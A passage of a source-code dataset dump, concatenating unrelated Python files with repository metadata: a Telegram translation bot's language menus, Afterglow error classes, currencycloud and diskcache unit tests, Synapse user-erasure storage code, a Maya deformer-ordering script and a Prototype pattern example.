InlineKeyboardButton("Albanian", callback_data='sq'),
InlineKeyboardButton("Amharic",callback_data ='am'),
],
[ InlineKeyboardButton("Arabic", callback_data='ar'),
InlineKeyboardButton("Armenian", callback_data='hy'),
InlineKeyboardButton("Azerbaijani",callback_data = 'az'),
],
[InlineKeyboardButton("Basque",callback_data ="eu"),
InlineKeyboardButton("Belarusian",callback_data ="be"),
InlineKeyboardButton("Bengali",callback_data="bn")],
[InlineKeyboardButton("Bosnian",callback_data = "bs"),
InlineKeyboardButton("Bulgarian",callback_data ="bg"),
InlineKeyboardButton("Catalan",callback_data = "ca")
],
[
InlineKeyboardButton("Corsican",callback_data ="co"),
InlineKeyboardButton("Croatian",callback_data = "hr"),
InlineKeyboardButton("Czech", callback_data = "cs"),
],
[ InlineKeyboardButton("Danish",callback_data = "da"),
InlineKeyboardButton("Dutch",callback_data = "nl"),
InlineKeyboardButton("Esperanto",callback_data = "eo"),
],
[InlineKeyboardButton(" Next --->",callback_data = "page2")
]
] )
keybord2= InlineKeyboardMarkup([
[InlineKeyboardButton("English",callback_data = "en"),
InlineKeyboardButton("Estonian",callback_data = "et"),
InlineKeyboardButton("Finnish",callback_data = "fi")
],
[InlineKeyboardButton("French",callback_data = "fr"),
InlineKeyboardButton("Frisian",callback_data = "fy"),
InlineKeyboardButton("Galician",callback_data = "gl")
],
[InlineKeyboardButton("Georgian",callback_data = "ka"),
InlineKeyboardButton("German",callback_data = "de"),
InlineKeyboardButton("Greek",callback_data = "el")
],
[InlineKeyboardButton("Gujarati",callback_data = "gu"),
InlineKeyboardButton("Haitian Creole",callback_data = "ht"),
InlineKeyboardButton("Hausa",callback_data ="ha")
],
[InlineKeyboardButton("Hindi",callback_data = "hi"),
InlineKeyboardButton("Hungarian",callback_data = "hu"),
InlineKeyboardButton("Icelandic",callback_data = "is")
],
[InlineKeyboardButton("Igbo",callback_data = "ig"),
InlineKeyboardButton("Indonesian",callback_data = "id"),
InlineKeyboardButton("Irish",callback_data = "ga")
],
[InlineKeyboardButton("<--- Back",callback_data = "page1"),
InlineKeyboardButton(" Next --->",callback_data = "page3"),
]
])
keybord3 = InlineKeyboardMarkup([
[ InlineKeyboardButton("Italian",callback_data = "it"),
InlineKeyboardButton("Japanese",callback_data = "ja"),
InlineKeyboardButton("Javanese",callback_data = "jv")
],
[InlineKeyboardButton("Kannada",callback_data = "kn"),
InlineKeyboardButton("Kazakh",callback_data = "kk"),
InlineKeyboardButton("Khmer",callback_data = "km")
],
[InlineKeyboardButton("Kinyarwanda",callback_data = "rw"),
InlineKeyboardButton("Korean",callback_data ="ko"),
InlineKeyboardButton("Kurdish",callback_data = "ku")
],
[ InlineKeyboardButton("Kyrgyz",callback_data ="ky"),
InlineKeyboardButton("Lao",callback_data = "lo"),
InlineKeyboardButton("Latin",callback_data = "la")
],
[InlineKeyboardButton("Latvian",callback_data = "lv"),
InlineKeyboardButton('Lithuanian',callback_data ="lt"),
InlineKeyboardButton("Luxembourgish",callback_data = "lb")
],
[InlineKeyboardButton("Macedonian",callback_data = "mk"),
InlineKeyboardButton("Malagasy",callback_data ="mg"),
InlineKeyboardButton("Malay",callback_data ="ms")
],
[InlineKeyboardButton("<--- Back",callback_data = "page2"),
InlineKeyboardButton(" Next --->",callback_data = "page4")
]
])
keybord4 = InlineKeyboardMarkup([
[InlineKeyboardButton("Malayalam",callback_data = "ml"),
InlineKeyboardButton("Maltese",callback_data = "mt"),
InlineKeyboardButton("Maori",callback_data = "mi")
],
[InlineKeyboardButton("Marathi",callback_data = "mr"),
InlineKeyboardButton("Mongolian",callback_data = "mn"),
InlineKeyboardButton("Myanmar (Burmese)",callback_data = "my")
],
[InlineKeyboardButton("Nepali",callback_data ="ne"),
InlineKeyboardButton("Norwegian",callback_data = "no"),
InlineKeyboardButton("Nyanja (Chichewa)",callback_data = "ny")
],
[InlineKeyboardButton("Odia",callback_data = "or"),
InlineKeyboardButton("Pashto",callback_data = "ps"),
InlineKeyboardButton("Persian",callback_data = "fa"),
],
[InlineKeyboardButton("Polish",callback_data = "pl"),
InlineKeyboardButton("Portuguese",callback_data = "pt"),
InlineKeyboardButton("Punjabi",callback_data = "pa"),
],
[InlineKeyboardButton("Romanian",callback_data = "ro"),
InlineKeyboardButton("Russian",callback_data = "ru"),
InlineKeyboardButton("Samoan",callback_data= "sm"),
],
[InlineKeyboardButton("<--- Back",callback_data = "page3"),
InlineKeyboardButton("Next --->",callback_data = "page5")
]
])
keybord5 = InlineKeyboardMarkup([
[InlineKeyboardButton("Scots Gaelic",callback_data = "gd"),
InlineKeyboardButton("Serbian",callback_data = "sr"),
InlineKeyboardButton("Sesotho",callback_data = "st")
],
[InlineKeyboardButton("Shona",callback_data ="sn"),
InlineKeyboardButton("Sindhi",callback_data ="sd"),
InlineKeyboardButton("Sinhala (Sinhalese)",callback_data = "si")
],
[InlineKeyboardButton("Slovak",callback_data = "sk"),
InlineKeyboardButton("Slovenian",callback_data = "sl"),
InlineKeyboardButton("Somali",callback_data = "so")
],
[InlineKeyboardButton("Spanish",callback_data = "es"),
InlineKeyboardButton("Sundanese",callback_data ="su"),
InlineKeyboardButton("Swahili",callback_data ="sw")
],
[InlineKeyboardButton("Swedish",callback_data = "sv"),
InlineKeyboardButton("Tagalog (Filipino)",callback_data ='tl'),
InlineKeyboardButton("Tajik",callback_data = "tg")
],
[InlineKeyboardButton("Afrikaans",callback_data = "af"),
InlineKeyboardButton("Tatar",callback_data = "tt"),
InlineKeyboardButton("Telugu",callback_data = "te")
],
[InlineKeyboardButton("<--- Back",callback_data = "page4"),
InlineKeyboardButton("Next --->",callback_data = "page6")
] ])
keybord6 = InlineKeyboardMarkup([
[InlineKeyboardButton("Thai",callback_data = "th"),
InlineKeyboardButton("Turkish",callback_data = "tr"),
InlineKeyboardButton("Turkmen",callback_data ="tk")
],
[InlineKeyboardButton("Ukrainian",callback_data = "uk"),
InlineKeyboardButton("Urdu",callback_data = "ur"),
InlineKeyboardButton("Uyghur",callback_data ="ug")
],
[InlineKeyboardButton("Uzbek",callback_data = "uz"),
InlineKeyboardButton("Vietnamese",callback_data ="vi"),
InlineKeyboardButton("Welsh",callback_data = "cy")
],
[InlineKeyboardButton("Xhosa",callback_data = "xh"),
InlineKeyboardButton("Yiddish",callback_data = "yi"),
InlineKeyboardButton("Yoruba",callback_data = "yo")],
[InlineKeyboardButton("<--- Back",callback_data = "page5")
] ])
tr_text = update.message.reply_to_message.text
cb_data = update.data
if cb_data== "page2":
await update.message.edit("Select language 👇",reply_markup = keybord2)
elif cb_data == "page1":
await update.message.edit("Select language 👇",reply_markup =keybord1)
elif cb_data =="page3":
await update.message.edit("Select language 👇",reply_markup =keybord3)
elif cb_data == "page4":
await update.message.edit("Select language 👇",reply_markup =keybord4)
elif cb_data =="page5":
await update.message.edit("Select language 👇",reply_markup =keybord5)
elif cb_data =="page6":
await update.message.edit("Select language 👇",reply_markup =keybord6)
else :
translator = Translator()
translation = translator.translate(tr_text,dest = cb_data)
await update.message.edit(translation.text)
| 43.958175 | 168 | 0.627714 |
acf6b2d493f136c6663d36ccfefb8b883d813e73 | 611 | py | Python | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | afterglow_core/errors/field_cal.py | JohnTorian/afterglow-core | e9dc0aa90e8ae84272ee686487acca8c16aa69b6 | [
"Apache-2.0"
] | null | null | null | """
Afterglow Core: photometric calibration errors (subcodes 40xx)
"""
from . import AfterglowError
__all__ = [
'DuplicateFieldCalError', 'UnknownFieldCalError',
]
class UnknownFieldCalError(AfterglowError):
"""
Unknown field calibration
Extra attributes::
id: requested field cal ID
"""
code = 404
subcode = 4000
message = 'Unknown field cal'
class DuplicateFieldCalError(AfterglowError):
"""
Field cal with this name already exists
Extra attributes::
name: field cal name
"""
subcode = 4001
message = 'Duplicate field cal name'
| 17.970588 | 62 | 0.667758 |
acf6b2e503da487ee69b0417a5f86205cda1ab3c | 5,905 | py | Python | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 12 | 2015-07-31T10:28:55.000Z | 2021-12-28T03:28:37.000Z | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 26 | 2015-07-01T16:25:19.000Z | 2022-02-25T14:42:18.000Z | tests/integration/test_errors.py | icebotariccl/currencycloud-python | 03bb0df2743e6669790dee6f2367f9e0500a4610 | [
"MIT"
] | 20 | 2015-10-14T18:21:04.000Z | 2022-02-02T09:59:28.000Z | from betamax import Betamax
from currencycloud import Client, Config
from currencycloud.errors import AuthenticationError, BadRequestError, ForbiddenError, NotFoundError, TooManyRequestsError
class TestError:
def setup_method(self, method):
# TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
# login_id and api_key with valid credentials before running the tests
login_id = 'development@currencycloud.com'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
environment = Config.ENV_DEMO
self.client = Client(login_id, api_key, environment)
def test_error_contains_full_details_for_api_error(self):
login_id = 'non-existent-login-id'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeef'
tmp_client = Client(login_id, api_key, Config.ENV_DEMO)
with Betamax(tmp_client.config.session) as betamax:
betamax.use_cassette('errors/contains_full_details_for_api_error')
error = None
try:
tmp_client.auth.authenticate()
raise Exception("Should have failed")
except BadRequestError as e:
error = e
assert error is not None
expected_error_fields = [
"login_id: non-existent-login-id",
"api_key: " + api_key,
"verb: post",
"url: https://devapi.currencycloud.com/v2/authenticate/api",
"status_code: 400",
"date:",
"request_id:",
"field: api_key",
"code: api_key_length_is_invalid",
"message: api_key should be 64 character(s) long",
"length: 64"
]
error_str = str(error)
missing = False
for f in expected_error_fields:
if f not in error_str:
missing = True
break
assert missing is False
def test_error_is_raised_on_incorrect_authentication_details(self):
login_id = 'non-existent-login-id'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
tmp_client = Client(login_id, api_key, Config.ENV_DEMO)
with Betamax(tmp_client.config.session) as betamax:
betamax.use_cassette('errors/is_raised_on_incorrect_authentication_details')
error = None
try:
tmp_client.auth.authenticate()
raise Exception("Should have failed")
except AuthenticationError as e:
error = e
assert error.code == 'auth_failed'
assert error.raw_response is not None
assert error.status_code == 401
assert len(error.messages) == 1
error_message = error.messages[0]
assert error_message.field == 'username'
assert error_message.code == 'invalid_supplied_credentials'
assert error_message.message == 'Authentication failed with the supplied credentials' # noqa
assert not error_message.params
def test_error_is_raised_when_a_resource_is_not_found(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('errors/is_raised_when_a_resource_is_not_found')
error = None
try:
self.client.beneficiaries.retrieve('081596c9-02de-483e-9f2a-4cf55dcdf98c')
raise Exception("Should have failed")
except NotFoundError as e:
error = e
assert error.code == 'beneficiary_not_found'
assert error.raw_response is not None
assert error.status_code == 404
assert len(error.messages) == 1
error_message = error.messages[0]
assert error_message.field == 'id'
assert error_message.code == 'beneficiary_not_found'
assert error_message.message == 'Beneficiary was not found for this id' # noqa
assert not error_message.params
def test_error_is_raised_when_too_many_requests_have_been_issued(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('errors/is_raised_when_too_many_requests_have_been_issued')
error = None
try:
self.client.auth.authenticate()
raise Exception("Should have failed")
except TooManyRequestsError as e:
error = e
assert error.code == 'too_many_requests'
assert error.raw_response is not None
assert error.status_code == 429
assert len(error.messages) == 1
error_message = error.messages[0]
assert error_message.field == 'base'
assert error_message.code == 'too_many_requests'
assert error_message.message == 'Too many requests have been made to the api. Please refer to the Developer Center for more information' # noqa
assert not error_message.params
def test_error_is_raised_on_forbidden_request(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('errors/is_raised_on_forbidden_request')
error = None
try:
self.client.transfers.find()
raise Exception("Should have failed")
except ForbiddenError as e:
error = e
assert error.code == 'permission_denied'
assert error.raw_response is not None
assert error.status_code == 403
assert len(error.messages) == 1
error_message = error.messages[0]
assert error_message.code == 'permission_denied'
assert error_message.message == "You do not have permission 'transfer_read' to perform this operation"
assert not error_message.params
| 40.170068 | 156 | 0.632684 |
acf6b2fb643d59411ed1e191d03cb09689d11986 | 3,698 | py | Python | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | null | null | null | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | 1 | 2021-05-13T17:27:16.000Z | 2021-05-19T14:38:32.000Z | synapse/storage/databases/main/user_erasure_store.py | jklippel/synapse | 451f25172afc0ce46e416c73fa703c5edf279d54 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.storage._base import SQLBaseStore
from synapse.util.caches.descriptors import cached, cachedList
class UserErasureWorkerStore(SQLBaseStore):
@cached()
async def is_user_erased(self, user_id: str) -> bool:
"""
Check if the given user id has requested erasure
Args:
user_id: full user id to check
Returns:
True if the user has requested erasure
"""
result = await self.db_pool.simple_select_onecol(
table="erased_users",
keyvalues={"user_id": user_id},
retcol="1",
desc="is_user_erased",
)
return bool(result)
@cachedList(cached_method_name="is_user_erased", list_name="user_ids")
async def are_users_erased(self, user_ids):
"""
Checks which users in a list have requested erasure
Args:
user_ids (iterable[str]): full user id to check
Returns:
dict[str, bool]:
for each user, whether the user has requested erasure.
"""
# this serves the dual purpose of (a) making sure we can do len and
# iterate it multiple times, and (b) avoiding duplicates.
user_ids = tuple(set(user_ids))
rows = await self.db_pool.simple_select_many_batch(
table="erased_users",
column="user_id",
iterable=user_ids,
retcols=("user_id",),
desc="are_users_erased",
)
erased_users = {row["user_id"] for row in rows}
return {u: u in erased_users for u in user_ids}
class UserErasureStore(UserErasureWorkerStore):
async def mark_user_erased(self, user_id: str) -> None:
"""Indicate that user_id wishes their message history to be erased.
Args:
user_id: full user_id to be erased
"""
def f(txn):
# first check if they are already in the list
txn.execute("SELECT 1 FROM erased_users WHERE user_id = ?", (user_id,))
if txn.fetchone():
return
# they are not already there: do the insert.
txn.execute("INSERT INTO erased_users (user_id) VALUES (?)", (user_id,))
self._invalidate_cache_and_stream(txn, self.is_user_erased, (user_id,))
await self.db_pool.runInteraction("mark_user_erased", f)
async def mark_user_not_erased(self, user_id: str) -> None:
"""Indicate that user_id is no longer erased.
Args:
user_id: full user_id to be un-erased
"""
def f(txn):
# first check if they are already in the list
txn.execute("SELECT 1 FROM erased_users WHERE user_id = ?", (user_id,))
if not txn.fetchone():
return
# They are there, delete them.
self.db_pool.simple_delete_one_txn(
txn, "erased_users", keyvalues={"user_id": user_id}
)
self._invalidate_cache_and_stream(txn, self.is_user_erased, (user_id,))
await self.db_pool.runInteraction("mark_user_not_erased", f)
| 33.926606 | 84 | 0.625473 |
acf6b3545353fff0b3f8593a86cc17166cb8e257 | 822 | py | Python | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | post_script_deformation_order_import.py | tokejepsen/mgear_scripts | 10254ce9cced28fc5cd8b94b34a881ca7075b7d1 | [
"MIT"
] | null | null | null | """
Deformation Order json file schema:
[
{
"node": "body_animation",
"order": [
"deltaMush1",
"skinCluster12"
]
}
]
NOTE: Only the inputs that needs changing should be included in the order.
"""
import os
import json
import pymel.core as pc
basename = os.path.basename(pc.sceneName())
filename = os.path.splitext(basename)[0]
directory = os.path.dirname(pc.sceneName())
# Find "{current file name}/deformation_order.json"
path = os.path.join(directory, filename, "deformation_order.json")
targets = []
if os.path.exists(path):
with open(path, "r") as f:
for data in json.load(f):
order = data["order"]
order.append(data["node"])
print("Processing {}".format(data["node"]))
pc.reorderDeformers(order)
| 23.485714 | 74 | 0.615572 |
acf6b366d1eedf32dc388325cbc42b9ddc6e1fda | 346 | py | Python | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | CreationalPatterns/Prototype.py | hexinatgithub/DesignPatterns | de0122b2c3df34b60e100cd0c8871c83a754117c | [
"MIT"
] | null | null | null | """
Specify the kinds of objects to create using a prototypical instance,
and create new objects by copying this prototype.
"""
import copy
class Prototype:
"""
Example class to be copied.
"""
pass
def main():
prototype = Prototype()
prototype_copy = copy.deepcopy(prototype)
if __name__ == "__main__":
main()
| 14.416667 | 69 | 0.66763 |
acf6b3fe7777b4aa4b5ebe343272ae69e712e3ec | 36,838 | py | Python | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | tests/test_core.py | audetto/python-diskcache | 8ba1d34972835a143bedda5927b4cdca338c2ebf | [
"Apache-2.0"
] | null | null | null | "Test diskcache.core.Cache."
from __future__ import print_function
import collections as co
import errno
import functools as ft
import hashlib
import io
import json
import mock
import os
import os.path as op
import pytest
import random
import shutil
import sqlite3
import subprocess as sp
import sys
import tempfile
import threading
import time
import unittest
import warnings
import zlib
try:
import cPickle as pickle
except:
import pickle
import diskcache
import diskcache as dc
pytestmark = pytest.mark.filterwarnings('ignore', category=dc.EmptyDirWarning)
if sys.hexversion < 0x03000000:
range = xrange
@pytest.fixture
def cache():
with dc.Cache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
for key, value in dc.DEFAULT_SETTINGS.items():
assert getattr(cache, key) == value
cache.check()
cache.close()
cache.close()
def test_init_disk():
with dc.Cache(disk_pickle_protocol=1, disk_min_file_size=2 ** 20) as cache:
key = (None, 0, 'abc')
cache[key] = 0
cache.check()
assert cache.disk_min_file_size == 2 ** 20
assert cache.disk_pickle_protocol == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_reset():
with dc.Cache(disk_min_file_size=0, disk_pickle_protocol=0) as cache:
value = (None, 0, 'abc')
cache[0] = value
cache.check()
assert cache.disk_min_file_size == 0
assert cache.disk_pickle_protocol == 0
assert cache._disk.min_file_size == 0
assert cache._disk.pickle_protocol == 0
cache.reset('disk_min_file_size', 2 ** 10)
cache.reset('disk_pickle_protocol', 2)
cache[1] = value
cache.check()
assert cache.disk_min_file_size == 2 ** 10
assert cache.disk_pickle_protocol == 2
assert cache._disk.min_file_size == 2 ** 10
assert cache._disk.pickle_protocol == 2
shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_valueerror():
with pytest.raises(ValueError):
with dc.Cache(disk=dc.Disk('test')):
pass
class JSONDisk(diskcache.Disk):
def __init__(self, directory, compress_level=1, **kwargs):
self.compress_level = compress_level
super(JSONDisk, self).__init__(directory, **kwargs)
def put(self, key):
json_bytes = json.dumps(key).encode('utf-8')
data = zlib.compress(json_bytes, self.compress_level)
return super(JSONDisk, self).put(data)
def get(self, key, raw):
data = super(JSONDisk, self).get(key, raw)
return json.loads(zlib.decompress(data).decode('utf-8'))
def store(self, value, read, key=dc.UNKNOWN):
if not read:
json_bytes = json.dumps(value).encode('utf-8')
value = zlib.compress(json_bytes, self.compress_level)
return super(JSONDisk, self).store(value, read, key=key)
def fetch(self, mode, filename, value, read):
data = super(JSONDisk, self).fetch(mode, filename, value, read)
if not read:
data = json.loads(zlib.decompress(data).decode('utf-8'))
return data
def test_custom_disk():
with dc.Cache(disk=JSONDisk, disk_compress_level=6) as cache:
values = [None, True, 0, 1.23, {}, [None] * 10000]
for value in values:
cache[value] = value
for value in values:
assert cache[value] == value
shutil.rmtree(cache.directory, ignore_errors=True)
class SHA256FilenameDisk(diskcache.Disk):
def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(self._directory, filename)
return filename, full_path
def test_custom_filename_disk():
with dc.Cache(disk=SHA256FilenameDisk) as cache:
for count in range(100, 200):
key = str(count).encode('ascii')
cache[key] = str(count) * int(1e5)
for count in range(100, 200):
key = str(count).encode('ascii')
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(cache.directory, filename)
with open(full_path) as reader:
content = reader.read()
assert content == str(count) * int(1e5)
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init_makedirs():
cache_dir = tempfile.mkdtemp()
shutil.rmtree(cache_dir)
makedirs = mock.Mock(side_effect=OSError(errno.EACCES))
with pytest.raises(EnvironmentError):
try:
with mock.patch('os.makedirs', makedirs):
cache = dc.Cache(cache_dir)
except EnvironmentError:
shutil.rmtree(cache_dir, ignore_errors=True)
raise
def test_pragma_error(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
cursor = mock.Mock()
fetchall = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.return_value = cursor
cursor.fetchall = fetchall
fetchall.side_effect = [sqlite3.OperationalError] * 60000
size = 2 ** 28
with mock.patch('time.sleep', lambda num: 0):
with mock.patch.object(cache, '_local', local):
with pytest.raises(sqlite3.OperationalError):
cache.reset('sqlite_mmap_size', size)
def test_close_error(cache):
class LocalTest(object):
def __init__(self):
self._calls = 0
def __getattr__(self, name):
if self._calls:
raise AttributeError
else:
self._calls += 1
return mock.Mock()
with mock.patch.object(cache, '_local', LocalTest()):
cache.close()
def test_getsetdel(cache):
values = [
(None, False),
((None,) * 2 ** 20, False),
(1234, False),
(2 ** 512, False),
(56.78, False),
(u'hello', False),
(u'hello' * 2 ** 20, False),
(b'world', False),
(b'world' * 2 ** 20, False),
(io.BytesIO(b'world' * 2 ** 20), True),
]
for key, (value, file_like) in enumerate(values):
assert cache.set(key, value, read=file_like)
assert len(cache) == len(values)
for key, (value, file_like) in enumerate(values):
if file_like:
assert cache[key] == value.getvalue()
else:
assert cache[key] == value
for key, _ in enumerate(values):
del cache[key]
assert len(cache) == 0
for value, (key, _) in enumerate(values):
cache[key] = value
assert len(cache) == len(values)
for value, (key, _) in enumerate(values):
assert cache[key] == value
for _, (key, _) in enumerate(values):
del cache[key]
assert len(cache) == 0
cache.check()
def test_get_keyerror1(cache):
with pytest.raises(KeyError):
cache[0]
def test_get_keyerror4(cache):
func = mock.Mock(side_effect=IOError(errno.ENOENT, ''))
cache.reset('statistics', True)
cache[0] = b'abcd' * 2 ** 20
with mock.patch('diskcache.core.open', func):
with pytest.raises((IOError, KeyError, OSError)):
cache[0]
def test_read(cache):
cache.set(0, b'abcd' * 2 ** 20)
with cache.read(0) as reader:
assert reader is not None
def test_read_keyerror(cache):
with pytest.raises(KeyError):
with cache.read(0) as reader:
pass
def test_set_twice(cache):
large_value = b'abcd' * 2 ** 20
cache[0] = 0
cache[0] = 1
assert cache[0] == 1
cache[0] = large_value
assert cache[0] == large_value
with cache.get(0, read=True) as reader:
assert reader.name is not None
cache[0] = 2
assert cache[0] == 2
assert cache.get(0, read=True) == 2
cache.check()
def test_set_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.set('a', 'b' * 2 ** 20)
finally:
cache.check()
def test_raw(cache):
assert cache.set(0, io.BytesIO(b'abcd'), read=True)
assert cache[0] == b'abcd'
def test_get(cache):
assert cache.get(0) is None
assert cache.get(1, 'dne') == 'dne'
assert cache.get(2, {}) == {}
assert cache.get(0, expire_time=True, tag=True) == (None, None, None)
assert cache.set(0, 0, expire=None, tag=u'number')
assert cache.get(0, expire_time=True) == (0, None)
assert cache.get(0, tag=True) == (0, u'number')
assert cache.get(0, expire_time=True, tag=True) == (0, None, u'number')
def test_get_expired_fast_path(cache):
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_fast_path(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.get(0) is None
def test_get_expired_slow_path(cache):
cache.stats(enable=True)
cache.reset('eviction_policy', 'least-recently-used')
assert cache.set(0, 0, expire=0.001)
time.sleep(0.01)
assert cache.get(0) is None
def test_get_ioerror_slow_path(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.get(0)
def test_pop(cache):
assert cache.incr('alpha') == 1
assert cache.pop('alpha') == 1
assert cache.get('alpha') is None
assert cache.check() == []
assert cache.set('alpha', 123, expire=1, tag='blue')
assert cache.pop('alpha', tag=True) == (123, 'blue')
assert cache.set('beta', 456, expire=1e-9, tag='green')
time.sleep(0.01)
assert cache.pop('beta', 'dne') == 'dne'
assert cache.set('gamma', 789, tag='red')
assert cache.pop('gamma', expire_time=True, tag=True) == (789, None, 'red')
assert cache.pop('dne') is None
assert cache.set('delta', 210)
assert cache.pop('delta', expire_time=True) == (210, None)
assert cache.set('epsilon', '0' * 2 ** 20)
assert cache.pop('epsilon') == '0' * 2 ** 20
def test_pop_ioerror(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pop(0) is None
def test_pop_ioerror_eacces(cache):
assert cache.set(0, 0)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pop(0)
def test_delete(cache):
cache[0] = 0
assert cache.delete(0)
assert len(cache) == 0
assert not cache.delete(0)
assert len(cache.check()) == 0
def test_del(cache):
with pytest.raises(KeyError):
del cache[0]
def test_del_expired(cache):
cache.set(0, 0, expire=0.001)
time.sleep(0.01)
with pytest.raises(KeyError):
del cache[0]
def test_stats(cache):
cache[0] = 0
assert cache.stats(enable=True) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats(reset=True) == (100, 10)
assert cache.stats(enable=False) == (0, 0)
for _ in range(100):
cache[0]
for _ in range(10):
cache.get(1)
assert cache.stats() == (0, 0)
assert len(cache.check()) == 0
def test_path(cache):
cache[0] = u'abc'
large_value = b'abc' * 2 ** 20
cache[1] = large_value
assert cache.get(0, read=True) == u'abc'
with cache.get(1, read=True) as reader:
assert reader.name is not None
path = reader.name
with open(path, 'rb') as reader:
value = reader.read()
assert value == large_value
assert len(cache.check()) == 0
def test_expire_rows(cache):
cache.reset('cull_limit', 0)
for value in range(10):
assert cache.set(value, value, expire=1e-9)
for value in range(10, 15):
assert cache.set(value, value)
assert len(cache) == 15
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.set(15, 15)
assert len(cache) == 6
assert len(cache.check()) == 0
def test_least_recently_stored(cache):
cache.reset('eviction_policy', u'least-recently-stored')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 2)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
for value in range(10):
assert cache[value] == million
for value in range(10, 20):
cache[value] = million
assert len(cache) == 10
for value in range(10):
cache[value] = million
count = len(cache)
for index, length in enumerate([1, 2, 3, 4]):
cache[10 + index] = million * length
assert len(cache) == count - length
assert cache[12] == million * 3
assert cache[13] == million * 4
assert len(cache.check()) == 0
def test_least_recently_used(cache):
cache.reset('eviction_policy', u'least-recently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
time.sleep(0.01)
cache[0]
cache[1]
cache[7]
cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_least_frequently_used(cache):
cache.reset('eviction_policy', u'least-frequently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
cache[0], cache[0], cache[0], cache[0], cache[0]
